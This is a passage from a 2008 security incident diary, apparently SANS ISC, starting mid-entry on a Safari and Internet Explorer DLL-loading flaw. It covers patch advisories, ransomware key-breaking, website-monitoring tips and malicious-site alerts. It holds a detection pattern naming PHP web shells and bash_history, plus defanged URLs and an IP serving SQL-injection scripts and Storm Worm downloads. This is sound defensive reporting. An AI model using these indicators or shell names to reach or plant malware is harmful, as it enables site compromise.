Now, when we combine these two vulnerabilities you get the following – a user visits a malicious web site with Safari. The web site causes Safari to automatically download the DLL file and store it on the desktop. The user now needs to open Internet Explorer from Desktop in order to automatically execute the DLL file. Keep in mind that the shortcut to Internet Explorer has to be on Desktop so the PATH environmental variable gets properly defined (it will make Internet Explorer search current directory for the DLL file).

Overall, the sky isn't falling, but in my opinion both Microsoft and Apple (Safari) should fix these "features". I don't see a reason why Internet Explorer would look for the DLL file in the current directory (this would effectively prevent this vulnerability). Apple should also fix Safari so it at least prompts the user before downloading the file. Apple already said that they don't consider this to be a security issue (which is partially correct), but since other browsers do this (at least Firefox and Internet Explorer), and it is good security practice, my humble opinion is that Apple should change this behavior.

Since the proof of concept is easily available, if you are using Safari on Windows please change the default download location as described in Microsoft's advisory available at http://www.microsoft.com/technet/security/advisory/953818.mspx.

Bojan

4 Comments

Published: 2008-06-11

OpenOffice 2.4.1 Out - Fixes One Vuln

OpenOffice has released 2.4.1 which fixes a heap overflow problem that allows attackers to craft malicious OpenOffice documents that can execute arbitrary code. (See their bulletin). The vulnerability is complicated by the platform independent nature of OpenOffice, but that just means someone has to write several versions of malicious files to ensure infected a variety of operating systems. Advice is, as always, update to the latest version.

--
John Bambenek / bambenek \at\ gmail |dot| com

0 Comments

Published: 2008-06-11

CitectSCADA Buffer Overflow Vulnerability

CORE Security has posted an alert on a vulnerability in the CitectSCADA product that allows remote attackers to execute a buffer overflow against their ODBC service. The CitectSCADA product is used to collect information from SCADA devices and provide an interface to manage those underlying devices. You can get an idea where CitectSCADA fits in the overall scheme of a SCADA system by taking a look at their product page. Basically, the CitectSCADA product monitors and manages the hardware, and this vulnerability in the worst-case scenario could be used to shutdown or takeover such hardware. This vulnerability also affects CitectFacilities as well. Latest versions of both software packages are vulnerable.

The main mitigating factor of this vulnerability is that such systems should not be connected to corporate networks nor the internet. Citect certainly recommends that these services be on a contained network, and that makes sense for most systems of this type. In the case of a system that is plugged into a "live" or accessible network, an attacker would still need to connect to the TCP port that managed the ODBC service. Firewalls and/or ACLs would prevent such attacks as well (the best firewall being an air gap, of course. ;) The last mitigating step is to turn off the ODBC service if it is not used in an environment.

Assuming that a remote attack could reach out and touch the service, they could perform a buffer overflow attack without authentication. ~~At this time, a patch does not appear to be available, nor is there a statement on Citect's website that I have found.~~ According to press reports, a patch was available last week and the vulnerability has been known by Citect for five months. There is no information about how many have applied the patch, but of course, if you run these systems, patch them.

COMMENTARY: Buffer overflows are well known and there are many tools to help software developers find them in an automated fashion. I have a hard time giving Citect the benefit of the doubt in this especially with the stakes so high in SCADA systems. There is no reason such a vulnerability make it out the door into production.

--
John Bambenek / bambenek \at\ gmail |dot| com

0 Comments

Linux ASN.1 BER kernel buffer overflow

Basic Encoding Rules (BER) is an encoding format in ASN.1 . The linux kernel implementation has a buffer overflow in it allowing a kernel compromise. It affects the CIFS and ip_nat_snmp_basic modules.

Updates available in Linux 2.6.25.5

More information:

CVE-2008-1673
Changelog at kernel.org

--
Swa Frantzen -- Gorilla Security

0 Comments

SNMP v3 trouble

SNMP typically isn't the most loved protocol when it comes to security, most of this stems from the older versions. The current version (SNMPv3) has a way to do authentication using a keyed-Hash Message Authentication Code (HMAC) HMAC.

It seems CERT is coordinating a vulnerability regarding this: "Implementations of SNMPv3 may allow a shortened HMAC code in the authenticator field to authenticate to an agent or a trap daemon using a minimum HMAC of 1 byte." Which obviously isn't the right thing to do.

Cisco has a security advisory on the topic, as will other vendors without much doubt.

--
Swa Frantzen -- Gorilla Security

0 Comments

June 2008 Black Tuesday Overview

Overview of the June 2008 Microsoft patches and their status.

#	Affected	Contra Indications	Known Exploits	Microsoft rating	ISC rating(*)
#	Affected	Contra Indications	Known Exploits	Microsoft rating	clients	servers
MS08-030	A vulnerabilities in the Bluetooth stack allows code execution when a large number of SDP (Service Discover Protocol) requests are made.
MS08-030	Bluetooth CVE-2008-1453	KB 951376	No publicly known exploits	Critical	Critical	Important
MS08-031	Multiple vulnerabilities in MSIE allow code execution and cross domain information leaks. The memory corruption gives access to the same rights as the logged-on user has. The vulnerability in parsing headers allows for HTTP Request Splitting, HTTP Request Smuggling and more (See CVE-2008-1544 for more details). Replaces MS08-024.
MS08-031	MSIE CVE-2008-1442 CVE-2008-1544	KB 950759	Details on attacking CVE-2008-1544 are publicly available	Critical	PATCH NOW	Important
MS08-032	A vulnerability in the Speech API accepts commands sent to it over the speakers of the computer, allowing an attacker access to the same rights as the user has. The speach recognition must be enabled for this to work. Replaces MS08-023.
MS08-032	ActiveX Kill Bits CVE-2007-0675	KB 950760	Publicly discussed	Moderate	Important	Less Urgent
MS08-033	Multiple input validation vulnerabilities allow code execution in DirectX. Affected are MPEG streams in ASF and AVI files and parameters of SAMI (Synchronized Accessible Media Interchange) files. Replaces MS07-064.
MS08-033	DirectX CVE-2008-0011 CVE-2008-1444	KB 951698	No publicly known exploits	Critical	Critical	Important
MS08-034	Privilege escalation vulnerability in WINS allows an attacker to gain complete control of a vulnerable system by sending crafted packets to the WINS server. Replaces MS04-045.
MS08-034	WINS CVE-2008-1451	KB 948745	No publicly known exploits	Important	Less Urgent	Critical
MS08-035	Input validation failure in the LDAP implementation part of AD leads to a Denial of Service. Replaces MS08-003.
MS08-035	Active Directory CVE-2008-1445	KB 953235	No publicly known exploits	Important	Less Urgent	Critical
MS08-036	Multiple input validation failures in the PGM packets allow a Denial of Service. PGM is active when MSMQ (Microsoft Message Queuing) is installed on a system. Replaces MS06-052.
MS08-036	PGM (Pragmatic General Multicast) CVE-2008-1440 CVE-2008-1441	KB 950762	No publicly known exploits	Important	Important	Important

We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating

We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

--
Swa Frantzen -- Gorilla Security

1 Comments

VLC: needs upgrading too!

One of those little things your users might manage to get installed for themselves is VLC.

Well they too have a new release that passed by all too quietly in the last few days. Barry reminded us about it.

So VLC Media Player 0.8.6h is the one you want to upgrade to, it fixes "security vulnerabilities in the Mozilla and ActiveX plugins, in the libpng, libid3tag, libvorbis libraries and in the Speex codec."

From their release notes:

0.8.6h:

Updated GnuTLS and libgcrypt (CVE-2008-1948, CVE-2008-1949, CVE-2008-1950)
Updated libxml2 (CVE-2007-6284)

0.8.6g (source release):

Removed VLC variable settings from Mozilla and ActiveX (CVE-2007-6683, VideoLAN-SA-0804)
Removed loading plug-ins from the current directory (CVE-2008-2147, VideoLAN-SA-0805)
Updated libpng (CVE-2008-1382)
Fixed libid3tag denial of service (CVE-2008-2109)
Fixed libvorbis vulnerabilities (CVE-2008-1419, CVE-2008-1420, CVE-2008-1423)
Fixed speex insufficient boundary check (CVE-2008-1686, oCERT-2008-004)

Make sure to be warned by the smallest vendor/software maker of who you use software or soon or later you'll miss one getting its patch before you discover it's been exploited.

--
Swa Frantzen -- Gorilla Secuity

1 Comments

Upgrade to QuickTime 7.5

Apple released earlier QuickTime 7.5, which a.o. fixes a number of security bugs.

Apple's security improvements include fixes for:

CVE-2008-1581: PICT images can lead to an heap overflow and code execution
CVE-2008-1582: AAC coded media can lead to code execution
CVE-2008-1583: PICT images can lead to an heap overflow and code execution
CVE-2008-1584: Indeo video codec can lead to a stack buffer overflow and code execution - note the fix: "This update addresses the issue by not rendering Indeo video codec content."
CVE-2008-1585: handling of file: URLs in QuickTime files could lead to an attacker controlled application launch and code execution - note the fix: "This update addresses the issue by revealing files in Finder or Windows Explorer rather than launching them."

--
Swa Frantzen -- Gorilla Security

0 Comments

http://isc.sans.org/diary.html?date=2008-05-15

Ransomware keybreaking

Some interesting bits about some new "ransomware". It's malware that encrypts the victim's data and asks to be sent money for the decrypting software. As such there is nothing spectacularly new were it not that it seems the attacker seems to have properly used cryptography to get it done: RC4 for the bulk of the work and then a 1024 bit RSA key public key to hide the RC4 key.

Well so far it looks like the malware author upped the ante and made it harder for the AV world to beat him. Especially since the largest RSA key ever to be publicly broken only weighs in at 663 bit length, not 1024 (which makes a huge difference!).

Kaspersky launched a project to ask for help in breaking the key. This would take about a year with millions of computers, so it's not something trivial to take on.

But there are a few problems here beyond the cryptographic challenge.

First, how do we know the attacker won't change the key before we're done. After all, it'll take him merely minutes to swap the key in a new strain of his malware and we're set for another year ? This isn't a race we're going to win.

It gets worse when reading Eran Tromer's writing over at MIT:

How do we know this public key (or his next key, or the one after that), is a key the attacker actually has the matching private key for? How do we know for sure this key doesn't belong to somebody else and by giving out the private key to thwart the apparent attacker we're actually helping him in his real attack against somebody else. This could be settled by letting through the right trickery proof the attacker that he actually has the key.

But suppose we don't get the proof, how do we know it's not even far worse and that this public key belong to some infrastructure we rely on to keep things safe ? Imagine the key belonging to a CA used to sign SSL certificates ... we'd be causing a whole lot of damage by making such a secret key known. Imagine the key belonging to a bank's https site, it would become vulnerable to a MitM attack without the customers getting so much as to have to click next on their attempts to connect (yeah, why browsers even allow you to do that, but that's another story).

I'd propose old fashioned police work instead: follow the money, seize the private key (if he has it) and throw the criminal(s) in jail for a very long time.

Some links:

Kaspersky press release
Description of the malware on viruslist
Kaspersky stop Gpcode forum

--
Swa Frantzen --- Gorilla Security

1 Comments

Published: 2008-06-09

So Where Are Those OpenSSH Key-based Attacks?

Last month, it was announced that there was a significant issue involving the Psuedo Random Number Generator (PRNG) on Linux distributions derived from Debian or Ubuntu. This issue caused the keys used for secure transmissions via SSL or SSH (and other applications) to be very predictable. If you missed out on these diary entries please see the below URLs.

One of our readers contacted the handler on duty to see if we had seen any reports since then of active attacks concerning this attack vector. The standard SSH port (22/tcp) has been at normal levels for the past several weeks with one exception (on May 27-28) per the data at Dshield.

The reader pointed us to a blog where it appears there is some activity originating from Debian or Ubuntu based attackers toward various servers. Looking at the limited bit of information in the blog, I think it is most likely just run of the mill brute force attacks which coincidentally originated from these particular Linux distros. In my particular area, I have seen a drop in SSH based attacks and an increase of targeted phishing scams in the past month.

Seeing that there isn't a major uptick in the past week or so, I would supposed that the attackers are taking a slower and less noisy approach on attacking the SSH vector. In any case, we are still interested in packet captures should any of you see any attacks which seems out of the ordinary.

References:

http://isc.sans.org/diary.html?storyid=4414

0 Comments

Published: 2008-06-07

What's going on with these ports? Got packets?

One of the first things I normally do when I start a shift as HOD is to look at our trends page and see if there is anything interesting going on. Today, I noted ports 8800, 1100, and 5905. And what the heck is going on with the periodic spikes on 22105? I see our friends at Arbor have posted a nice story about the port 1100 stuff and what they think that is all about, but if anyone has thoughts on any of these others and/or are able to capture some packets (something more than just SYN packets ) let us know via the contact page.

---Jim

0 Comments

Published: 2008-06-07

Followup to 'How do you monitor your website?'

On 28 May, I posted a story asking for your input. Last weekend got busy, so I didn't post the results, but since I had another shift coming up, I figured I'd do it now. I got quite a few responses (my apologies for the length of this diary), but many of them made good points, so I'm going to share them here mostly unedited. So, without further ado....

The conversation that started it all from Steve began with this: "On one of the web-servers I help administrate, I use a script that scans each file in the WWW folder. The file takes a search pattern and scans the file to see if there is a match. If there is, then you will get an email displaying the location of the file and what triggered a match. I have used this script to clean out many PHP based shell scripts and was wondering if you know of anything I can add to the search string to give it more coverage.

String currently used:
$OOO0O0O00|r0nin|p,a,c,k,e,d|m0rtix|r57shell|c99shell|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute
*force|MultiViews|cwings|bitchx|eggdrop|guardservices|psyBNC|DALnet"
From Jason: "A WAF (Web Application Firewall).

As an InfoSec admin, one of the big things I feel is missing in my arsenal is real-time access to the Web logs of any servers I'm meant to be protecting.

WAFs are great (go modsecurity!) as they not only protect your sites from known attacks, but having access to the centralized logs (a WAF could protect dozens of servers) means you have the opportunity to post-process - looking for "odd" things - stuff that no filter can detect.

NIDS can't do this job - they aren't meant to - and can't handle HTTPS anyway. "
From John: "from what i can tell the proventia G/M device picks up most of all this garbage when tuned properly. It will pick up the SQL injection attempts, it also picks up the cross site scripting from visiting compromised sites, and the transfer of the trojan if you happen to make it that far."
From David: "For the most part, I have a script I call "Adaptive Firewall". It searches for "suspicious" activity in the log files. When it finds an entry, it grabs the IP which is in turn fully blocked from the server at the firewall. So an attack via one port will prevent further attacks even on other ports.

It works great against SSH brute force attacks. After seeing the first attempts, no additional attempts even touch the server. Same for most (known) web scan attacks (looking for .dlls, .exes, etc). Though there is the small time delay between detection and blocking."
From Florian: "I'm too lazy to keep tripwire rules maintained so I just use a little bash script via cron to check md5sum's of my site every 15 minutes. Quick n dirty but it works, caught it when I forgot to update my google adsense wordpress plugin and got owned."
From Scott: "we have a simple script which runs every 30 seconds to monitor for changed content. if there's any unexpected content on there we find out pretty quickly."
From David: "I've been very happy with OSSEC (I guess part of the "etc" in the list from the blog posting). I've found it helpful both in file integrity monitoring/new file alerting and in the immediate feedback it provides to oddities in the log files it monitors. Combined with mod_sec, I get an early alert to anything odd going on. But my website is pretty small and traffic light -- that might well become too much chatter on a larger, more trafficked site.

In my former life, I wrote some monitoring scripts that, among other things, confirmed that our revenue generating links were always on our home page -- figuring they would be the first to be monkeyed with if we were hacked. We looked for ports open that should not have been -- even though the firewall would block the traffic, we wanted to know if any new ports were opened.

I imagine if I had a database driven site, with all the SQL injection attacks, I would be crawling the site and looking for odd things (maybe build a hash of links and look for any outside my domain that seemed to appear too many times; any src= tags outside my domain, and maybe any javascript or object src= tags that I didn't approve). I'd also script some monitoring of the SQL log for things that shouldn't be there -- better still, anything that does not look like approved use."
From Mike: "As I do not have the time to diagnose issues I have fallen back to an old concept, I keep master copies of all sites on a local server and use an automation enabled FTP program to compare them on a schedule. If anything has changed the site is forced back to it's original state. While this does wipe out any chance of reverse forensics it does serve the main purpose.. to protect your website visitors. And it works on any hosting server wjich provides FTP access without running any additional programs on the webserver!

Not very fancy but quite effective."
From Andy: "Just a little note. Aside from using the usual mysql_escape_string in php, all search strings used throughout the site are submitted to a second database with only one randomly named table in there, so no chance of dropping tables, no logging on tricks for it etc.

I check this log every day just to see what people are doing, it records the IP timestamp and string entered."
From Alec: "We try to not use application logfiles (Apache, IIS, whatever) for security monitoring. If the host is indeed compromised, you can't trust the contents of the logfiles anyway - I have first hand experience of the traces of an IIS exploit being removed from the IIS logs by the exploit itself. The logs on the server's disk are corroborative evidence at best.

To get a "true" picture of what is actually going on, we ship application logs off-box ASAP via Snare Epilog, allowing for differential analysis of the two sets of logs. We also use Sguil for full-content capture straight off the wire, and collect Netflow data.

Any games of spot-the-SQL-injection can then be performed on what are hopefully unadulterated records of activity, and Netflow reporting can tell you if one of your servers has suddenly starting sourcing traffic itself (malware C&C channel etc.)."
To which fellow handler Swa adds "While in the windows world it doesn't come native, syslog is a great way to get logs from servers/sevices and/or application off to a central (or better: 2 central) severs that can even be independently managed (so as to make sure they aren't going to be swept up together with another attack or even an insider job among your admins.

In mixed environments I've seen good use of Kiwi: http://www.kiwisyslog.com/"
From Joshua: "Nessus has the ability to mirror content from a website and check the contents for patterns. We do this anytime there is a new "big" insertion threat out there.

I also check zone-h.org, xssed.org everyday to see if there are any reported defacements or xss vulnerabilities found within our domains.

We have Google alerts setup with some common key words (viagra, cialis, casino, ...) used in insertion attacks."
From Mike: "PHPIDS
Web Application Security 2.0
http://php-ids.org/
PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to
decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user?s session."
From Hector: "Right now, I'm using Nagios to check the integrity of the website pages and mod_security to log potential attacks. I'm going to try tripwire and AIDE."
From Barry: "CVS...(or similar)...regularly export the files out onto the website (you can diff them to give early warning of attacks or simply blat over the top) - only deals with source not database contents so doesn't handle drive-by SQL injection...still, no reason not to script up automated queries to search the database contents for badness...e.g. if your database content shouldn't have absolute URLS, what are they doing in there?"
From Janantha: "I think the best thing is to have custom script that does the following. I'm thinking we can make the monitoring better using "Integrity" => hashing

-Prior to uploading the finalized version to the web server, tar the whole directory and hash it.

-Create a crontab to regularly (every 2 mins or so) tar and hash the home directory and save the hash in a location outside /var/www/ (non-public) location. It could compare the current hash with the previous one. As soon as it detects a change it alerts the administrator.

Condition should be that the webmaster should have the latest hash for every major update made to that directory. And has a "Clean" backup in hand to restore if something has happened."
From MysteryFCM: "I use a program I wrote called hpObserver, that notifies me of downtime, and changes to any of the pages ....

I also periodically go through the server logs to check for attempted exploits etc - tis all good fun!"

So there you have it. My thanks to everyone who took the time to write in. On my personal server, I use aide, SEC (Simple Event Correlator) for near realtime log monitoring, OSSEC, mod_security, and some home grown scripts, but mine is basically static anyway, so it is probably overkill.

0 Comments

Published: 2008-06-06

Amazon.com Issues

We're getting a lot of reports that amazon.com is returning: Http/1.1 Service Unavailable

So far we have no information that this is a security incident or a major infrastructure issue.

-KL

1 Comments

Published: 2008-06-06

Microsoft Security Bulletin Advance Notification for June 2008

Microsoft released the advance notification for next week's Security Bulletin release.

The original announcement is available here: www.microsoft.com/technet/security/bulletin/ms08-Jun.mspx

The Microsoft Security Response Center (MSRC) has released their own blog announcement here: blogs.technet.com/msrc/archive/2008/06/05/june-2008-advance-notification.aspx

A quick review:

3 Critical

Bluetooth
Internet Explorer
DirectX

3 Important

WINS
Active Directory
PGM

1 Moderate

Kill Bits

I find the Bluetooth vulnerability to be the most interesting.

-KL

0 Comments

Published: 2008-06-05

Elevator pitch for explaining security risks to executives

How to catch the attention of a busy executive, to highlight an important security risk? An elevator pitch is a persuasive statement delivered verbally in the time you would share with the listener in an elevator--about 60 seconds. It is often used by entrepreneurs to convince a potential investor to learn more about the start-up. We can use an elevator pitch to highlight the importance of a security risk to a business or IT executive.

If you've never given or heard a traditional elevator pitch, take a look at the Elevator Pitches website at TechCrunch, which presents many videos from hopeful entrepreneurs. (Consider pitches for SmugMug, Ugobe, Framr.) You may notice that those pitches that catch your attention have a few characteristics in common:

They are brief. The listener has a limited attention span.
They are specific. The issues they bring up are easy to understand and visualize.
They differentiate. The speaker clarifies what his issue different from the rest.
They empathize with the listener. The listener needs to know why he should care.
They have a clear ending point. The speaker clarifies at the end what he wants the listener to do.

Let's say you are concerned about a security risk no one is paying attention to. Maybe it's a web server everyone is afraid to patch. Maybe its the practice of allowing visitors to plug into your LAN. Use an elevator pitch to convince management to pay attention and support you.

Here are my hypothetical examples that may inspire you to explain your security risks. Remember: be brief and specific, differentiate the concern from other similar issues, clarify why the executive should care, and state what you want.

Example 1: "Our extranet website is missing dozens of critical security updates. The site could crash or become infected at any minute, and it may take us weeks to recover. This will prevent us from communicating with our supply chain partners, and will lead to thousands in losses. The challenge is that the app running on the server was written years ago by people who left the company, so everyone is afraid to touch the server. Yet, if we do nothing, we're sitting on a ticking time bomb. I need your help to get the right people together so we can make a decision. Could I invite you to a 30-minute meeting I'm organizing for tomorrow?"

Example 2: "Have you noticed that every vendor who visits us plugs into our LAN as soon as they unpack their laptop? If their system has a virus, the infection will likely spread to our internal systems. This is a significant threat we have not considered, as our patching practices rely heavily on the effectiveness of our network perimeter. As a result, our internal servers could get compromised, severely disrupting operations. I evaluated a few products that would let us control who can plug into the LAN. Could we speak next Monday about this issue--I think I have a solution you might like, but I need your feedback before continuing with the project."

An important point to consider with elevator pitches: Their aim is not to explain everything you want to say about the issue. Instead, the goal is to catch the listener's attention, so he would give you the additional time needed to explore the issue more carefully. Also, remember that preparation is critical, because you only have a minute to deliver your pitch. Don't memorize your statement, because then it may sound fake and rehearsed, but definitely consider what you will say before approaching the executive.

-- Lenny

Lenny Zeltser
Security Consulting - SAVVIS, Inc.

Lenny teaches a SANS course on analyzing malware.

1 Comments

Published: 2008-06-05

Investigating fraudulent email and another Nigerian scam twist

"THOSE PEOPLE YOU ARE DEALING WITH ARE FAKE." So starts the Nigerian-style scam email submitted to us by Daniel Sefton. In such schemes, the sender attempts to swindle the recipient out of money, often by convincing the victim to pay some fee to transfer a prize, an inheritance sum, or money from another unexpected source.

Contents the Fraudulent Email

The message we received offers an interesting twist on the scam by warning the recipient to be careful when receiving such messages. The email claims to come from Susan Walter, a US citizen living in Texas. "Susan" writes, "I am one of those that executed a contract in Nigeria years ago and they refused to pay me, I had paid over $70,000 trying to get my payment all to no avail."

The message explains how "Susan" traveled to Nigeria in an attempt to collect the funds owed to her. There, she met with Barr. Mat Oto, a "member of CONTRACT AWARD COMMITTEE." He then "took me to the paying bank, which is Zenith Bank, and I am the happiest woman on this earth because I have received my contract funds of $4.2Million USD."

"Susan" also explains that she saw documents that listed the recipient of her email as a victim of such a fraud. She advises the recipient to contact Barr. Mat Oto via the supplied contact details. This will allow the recipient to retrieve the money that might be owed to him or her, at the mere cost of $1,200 payable to the Internal Revenue Service (IRS).

A web search revealed that such messages began circulating in late April, 2008. April's message I encountered used a specified a different name for the helpful Nigerian official, "Barrister Afam Richardson Esq," and used the subject "Your happiness is my concern." A message sent in May used "Susan Walter" as a sender. One specified the amount paid to IRS as $980; another as $1,200.

Investigating Fraudulent Messages

If you receive a suspicious message, consider searching for its elements on urgentmessage.org. This website archives and indexes spam messages of fraudulent nature. The most interesting feature of the site is the correlation it performs across contact details specified in the messages, such as names, email addresses, and phone numbers. This helps you find related messages to understand the scope and history of the scam.

Consider the diagram the website generated for "Susan's" message described above:

The diagram on the website is clickable. Clicking on "Susan's" email address brought me to a page that showed a related message and additional elements worth investigating:

Very handy!

Do you have your favorite tools or websites for investigating fraudulent emails? Let us know, and we'll share your tips with our readers.

-- Lenny

Lenny Zeltser
Security Consulting - SAVVIS, Inc.

Lenny teaches a SANS course on analyzing malware.

0 Comments

Published: 2008-06-04

5 News Cisco Vulnerabilities for PIX and ASA

Cisco has released details on 5 vulnerabilities with their PIX and ASA product lines. In short, the quick bullet list of vulnerabilities is:

Crafted TCP ACK Packet Vulnerability (Denial of Service)
Crafted TLS Packet Vulnerability (Denial of Service)
Instant Messenger Inspection Vulnerability (Denial of Service)
Vulnerability Scan Denial of Service (Denial of Service)
Control-plane Access Control List Vulnerability (Bypass ACL)

Updates are available to fix all of the above and there are no workarounds for the final four of these. In short, update your devices. Good news is that these were internal finds and it doesn't appear there is exploitation or "public" knowledge of the vulnerability details to create exploits.

--
John Bambenek / bambenek \at\ gmail |dot| com

0 Comments

Published: 2008-06-03

Level 3 outage in St. Louis

Thanks to Gary for sending this in!

According to Internetpulse.net, it appears as if Level 3 is having a bit of an outage in St. Louis this morning. We'll keep our eye on it, but if you have any information, please feel free to write in at the "Contact" link at the top of the page.

Joel Esler

2 Comments

New sql injection site with fastflux hosting

One of our frequent contributors notified us of a new sql injection site.
hxxp://en-us18.com/b.js is being injected via sql into websites.

When I googled for it I saw 560 injected webpages.
“b.js injects an iFrame which points to
hxxp://en-us18.com/cgi-bin/index.cgi?ad
which in turn embeds two Flash files:

advert.swf:
http://www.virustotal.com/analisis/d6ffe290e9938d3e646f82c536abd0c7
banner.swf:
http://www.virustotal.com/analisis/83be3d4d30eb60d92272625634a3babc”

This appears to be fast fluxed or at least setup to change rapidly based on this dig output.

dig www.en-us18.com
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 4, ADDITIONAL: 1
;; QUERY SECTION:
;;      www.en-us18.com, type = A, class = IN
;; ANSWER SECTION:
www.en-us18.com.        10M IN A        156.17.227.218
www.en-us18.com.        10M IN A        84.121.210.189
www.en-us18.com.        10M IN A        99.194.80.27
www.en-us18.com.        10M IN A        69.65.91.5
www.en-us18.com.        10M IN A        83.27.126.102
www.en-us18.com.        10M IN A        99.225.66.211
www.en-us18.com.        10M IN A        82.159.61.76
www.en-us18.com.        10M IN A        85.53.64.13
www.en-us18.com.        10M IN A        148.81.132.211
www.en-us18.com.        10M IN A        83.23.188.93
www.en-us18.com.        10M IN A        216.170.109.251
www.en-us18.com.        10M IN A        62.21.81.188
www.en-us18.com.        10M IN A        83.242.74.153
www.en-us18.com.        10M IN A        87.205.33.92
;; AUTHORITY SECTION:
en-us18.com.            1d18h57m52s IN NS ns3.en-us18.com.
en-us18.com.            1d18h57m52s IN NS ns2.en-us18.com.
en-us18.com.            1d18h57m52s IN NS ns4.en-us18.com.
en-us18.com.            1d18h57m52s IN NS ns1.en-us18.com.
;; ADDITIONAL SECTION:
ns1.en-us18.com.        1d21h10m38s IN A 75.110.190.181

A second dig a few minutes later produced similar but slightly different results.
So this domain is changing. I guess they got tired of people blackholing their ip address.
So in that case I would recommend you dns blackhole that domain.

0 Comments

New Stormworm download site

New Stormworm download site
DavidF brought a new stormworm download site to our attention.
122.118.131.58 is being spammed out with a message that states:

“Crazy in love with you” hxxp://122.118.131.58

I checked that site and could only find an index.html, lr.gif and loveyou.exe. lr.gif is a gif file that says “love riddles”.
Index.html encourages visitors to run loveyou.exe by asking ‘Who is loving you? Do you want to know? Just click here and choose either “Open” or “Run”’. loveyou.exe is a version of Trojan.Peacom.D aka Stormworm.

I recommend you block this ip address till it gets cleaned up.

0 Comments

A little vunerable 'flash from the past' ala MS-XP-SP3

It appears that XP service pack 3 installs an older vulnerable version of the flash player.
Causing those systems to be vulnerable to these vulnerabilities.
http://www.adobe.com/support/security/bulletins/apsb06-11.html

Microsoft has documented it here:
http://www.microsoft.com/technet/security/Bulletin/MS06-069.mspx

"Why was this Bulletin revised on May 13, 2008?
This bulletin was revised to add Windows XP Service Pack 3 as affected software.
This is a detection update only. There were no changes to the binaries, since
the same update for Windows XP Service Pack 2 and Windows XP Professional x64
Edition applies to Windows XP Service Pack 3. Customers with Windows XP Service
Pack 2 and Windows XP Professional x64 Edition who have already installed the security
update will not need to reinstall the update. Customers with Windows XP Service Pack 3
should apply the update immediately."

0 Comments

Emergingthreats.net and ThePlanet

You know what they say about the best laid plans... Several of our readers have written in today saying they couldn't reach emergingthreats.net. I just talked to Matt Jonkman and he tells me that they expect to be live again shortly (maybe even by the time you read this). It turns out they have 2 servers that used to be in 2 different datacenters until ThePlanet bought ev1 and moved their other server into that same datacenter in Houston where their first server was located. You know, the one that had the big fire (see http://isc.sans.org/diary.html?storyid=4504).

0 Comments